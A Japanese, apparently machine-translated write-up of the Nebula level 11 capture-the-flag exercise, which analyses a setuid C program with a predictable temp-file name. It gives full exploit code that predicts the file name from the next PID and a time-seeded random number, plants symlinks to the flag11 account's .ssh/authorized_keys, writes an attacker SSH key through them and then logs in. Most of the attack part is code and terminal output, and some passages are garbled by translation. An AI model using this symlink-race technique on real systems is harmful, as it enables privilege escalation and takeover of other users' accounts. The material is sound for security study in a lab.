星雲レベル11：setuidが機能していません

星雲レベル11の解決方法

必要なファイルは_/home/flag11_の下にあります。

_level11@nebula:~$ ls ../flag11/ -all
total 21
drwxr-x--- 1 flag11 level11   100 2016-12-20 15:11 .
drwxr-xr-x 1 root   root      140 2012-08-27 07:18 ..
-rw------- 1 flag11 flag11     14 2016-12-20 15:11 .bash_history
-rw-r--r-- 1 flag11 flag11    220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag11 flag11   3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag11 flag11     60 2016-12-20 15:08 .cache
-rwsr-x--- 1 flag11 level11 12135 2012-08-19 20:55 flag11
-rw-r--r-- 1 flag11 flag11    675 2011-05-18 02:54 .profile
drwxr-xr-x 1 flag11 flag11     60 2016-12-20 15:07 .ssh
_

この小さな_.ssh_フォルダは、私の脳内にある種のアラーム信号を発生させます。後で必要になるかもしれません。ご覧のとおり、最近アクセスしたファイルの一部です。これは私の攻撃によるものでした。

添付の演習のCコードは次のとおりです。

_#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>

/*
 * Return a random, non predictable file, and return the file descriptor for it.
 */

int getrand(char **path)
{
  char *tmp;
  int pid;
  int fd;

  srandom(time(NULL));

  tmp = getenv("TEMP");
  pid = getpid();

  asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
      'A' + (random() % 26), '0' + (random() % 10),
      'a' + (random() % 26), 'A' + (random() % 26),
      '0' + (random() % 10), 'a' + (random() % 26));

  fd = open(*path, O_CREAT|O_RDWR, 0600);
  unlink(*path);
  return fd;
}

void process(char *buffer, int length)
{
  unsigned int key;
  int i;

  key = length & 0xff;

  for(i = 0; i < length; i++) {
      buffer[i] ^= key;
      key -= buffer[i];
  }

  system(buffer);
}

#define CL "Content-Length: "

int main(int argc, char **argv)
{
  char line[256];
  char buf[1024];
  char *mem;
  int length;
  int fd;
  char *path;

  if(fgets(line, sizeof(line), stdin) == NULL) {
      errx(1, "reading from stdin");
  }

  if(strncmp(line, CL, strlen(CL)) != 0) {
      errx(1, "invalid header");
  }

  length = atoi(line + strlen(CL));

  if(length < sizeof(buf)) {
      if(fread(buf, length, 1, stdin) != length) {
          err(1, "fread length");
      }
      process(buf, length);
  } else {
      int blue = length;
      int pink;

      fd = getrand(&path);

      while(blue > 0) {
          printf("blue = %d, length = %d, ", blue, length);

          pink = fread(buf, 1, sizeof(buf), stdin);
          printf("pink = %d\n", pink);

          if(pink <= 0) {
              err(1, "fread fail(blue = %d, length = %d)", blue, length);
          }
          write(fd, buf, pink);

          blue -= pink;
      }    

      mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
      if(mem == MAP_FAILED) {
          err(1, "mmap");
      }
      process(mem, length);
  }

}
_

このコードを分析した後、_Return a random, non predictable file, and return the file descriptor for it._。誰かが予測できないと言ったとき、私は予測しようとします。残りのコードは検査が必要なので、これは少し延期する必要があります。古いLinuxシステムでは、プロセスのpidはかなり予測可能です。もちろん、時間とともにシードされたsrandom()も予測可能です。

さて、processのバッファを解読するために使用されるいくつかの[〜＃〜] xor [〜＃〜]暗号化スキームがあり、これ解読されたバッファはシステムに渡されます。ここで、いくつかの攻撃的な呼び出しを挿入する必要があります。ファイルの検査から、これがもう1つのsetuidビットの課題であることがわかったので、これは私が思ったように不調になっていることを承知しています。率直に言って、私は少し楽観的でした。

メイン関数では、処理バッファーはstdinで満たされ、ハードコードされたプレフィックスナッシングマジックに対してチェックされます。

_#define CL "Content-Length: "

int main(int argc, char **argv)
{
  // ...
  if(fgets(line, sizeof(line), stdin) == NULL) {
      errx(1, "reading from stdin");
  }

  if(strncmp(line, CL, strlen(CL)) != 0) {
      errx(1, "invalid header");
  }

  length = atoi(line + strlen(CL));

  if(length < sizeof(buf)) {
      if(fread(buf, length, 1, stdin) != length) {
          err(1, "fread length");
      }
      process(buf, length);
  } else {

  //...
}
_

err関数は、ヒットしたときに実行可能ファイルを終了します。次のチェックif(fread(buf, length, 1, stdin) != length) {をバイパスするには、この実行可能ファイルに渡される長さが1である必要があります。この場合、挿入されるコードは非常に制限されます。オーバーフローatoiと負の数のテストは常に失敗しました。 freadはバイト数ではなく、読み取られたアイテムの数を返すため、この場合は常に1を返します。 PATH変数に制御下にあるパスを装うことができることがわかっている他の演習を形成します。したがって、マジックprocess()関数に単一の文字を挿入する必要があるだけです。 [〜＃〜] xor [〜＃〜]の逆はかなり単純です。コマンドを実行するには、バッファ全体がsystemに渡されるため、いくつかの試行が必要になる場合があります。バッファはmainのスタックに配置されているため、ゴミでいっぱいです。しかし、2番目の文字でゼロに到達する可能性はそれほど悪くありません。私はすでに自分の成功を感じていましたが、それからこれを得ました：

_getflag is executing on a non-flag account, this doesn't count  
_

今回は不正行為ではありませんでしたが、提供されたソースコードの星雲の作者は、システムを呼び出す前にsetuidビットを削除したことについて触れていません。これはstraceコマンドによって公開されました。

_getgid32()                              = 1012
setgid32(1012)                          = 0
getuid32()                              = 1012
setuid32(1012)                          = 0
rt_sigaction(SIGINT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfa443a8) = 6180
_

さて、これは行き止まりのようです。設計図に戻ると、[〜＃〜] ssh [〜＃〜]のアイデアが再び現れました。しかし、どのように_.ssh_フォルダを使用できますか。これは、_authorized_keys_ファイルをそこに挿入するのが非常に簡単です。しかし、これをsetuidなしで実現するにはどうすればよいでしょうか。

_  } else {
      int blue = length;
      int pink;

      fd = getrand(&path);

      while(blue > 0) {
          printf("blue = %d, length = %d, ", blue, length);

          pink = fread(buf, 1, sizeof(buf), stdin);
          printf("pink = %d\n", pink);

          if(pink <= 0) {
              err(1, "fread fail(blue = %d, length = %d)", blue, length);
          }
          write(fd, buf, pink);

          blue -= pink;
      }    

      mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
      if(mem == MAP_FAILED) {
          err(1, "mmap");
      }
      process(mem, length);

}
_

これまでのところ、buffer長さチェックのelseケースは完全に無視しました。これが、スーパートップシークレットの一時ファイル名がゲームに登場する場所です。ファイルを制御するには、シェルから環境変数を定義する必要があります。後で攻撃を実行します。

_export TEMP=/tmp
_

これは、被害者の[〜＃〜] pid [〜＃〜]を推測するだけの問題です。これは簡単です。stdoutを被害者のstdinにパイプすると、可能性が高くなるだけで、私たちの標準の1つになります。それ以外の場合は、popen()を使用して_ps | grep flag11_からpidを挿入できます。時間の部分は秒単位の時間なので、非常に簡単です。安定した成功率を得るために、次の1秒間のファイル名も使用します。攻撃者のコード全体は次のようになります。

_int getrand(char **path, int pid, int time)
{
  char *tmp;
  int fd =  0;

  srandom(time);

  tmp = getenv("TEMP");
  asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
      'A' + (random() % 26), '0' + (random() % 10),
      'a' + (random() % 26), 'A' + (random() % 26),
      '0' + (random() % 10), 'a' + (random() % 26));


  return fd;
}

#define CL "Content-Length: "

int main(int argc, char **argv)
{
  char line[256];
  char buf[2048] = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyS3QqEqbQHTk30QVRpzPVlKjM0px2iMhFfKFP0AmV8vOzCxVLJrYQv0CKPzQDdnszm/H+HrUjBS+c2RY0QB7IPJ8++tuqNEfewoYHJ80NI+7e9mn0HxlN9NCvI6TGX0+1s0VigwtKmq29pP7jHgualoowGrllnk42QI1nvUern6WZUu/Ry+lGyjyYbgd6BSOQpuvnxpxsFDWuk7AsUwrHJijPstS+lsrFZaMEYGqlxHv2hPjCFoADlrTCgusmrwLWsh/ljPfpgzRs2Ts/KF901xpCoHdzzwpckLuoA8+bYznifBp+StDEMkT5gZDygDUTfz5xhYr+KEx1ijHMHvix level11@nebula";

  int pid;
  int fd;
  char *path;
  FILE* stream;

  pid = getpid()+1;
  getrand(&path, pid, time(NULL));
  symlink("/home/flag11/.ssh/authorized_keys",path);
  getrand(&path, pid, time(NULL)+1);
  symlink("/home/flag11/.ssh/authorized_keys",path);
  fprintf(stdout, "%s%d\n%s",CL,sizeof(buf),buf);
}
_

Sshキーを最初に生成する必要があります。これらの奇妙なチェックを色で満たそうとするのに、少し時間がかかりました。おそらく、オーバーフローの問題が発生しないように、time()関数の形式を確認する必要があります。現時点では、バッファを暗号化する必要がない理由は不明です。たぶん、mmap関数の専門分野です。とにかく、sshキーを挿入すると、flag11アカウントにログインしてフラグを取得できます。

_level11@nebula:~$ ./pwn11 | ../flag11/flag11
blue = 2048, length = 2048, pink = 395
blue = 1653, length = 2048, pink = 0
flag11: fread fail(blue = 1653, length = 2048): Operation not permitted
level11@nebula:~$ ssh flag11@localhost

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

flag11@nebula:~$ getflag    
You have successfully executed getflag on a target account
flag11@nebula:~$
_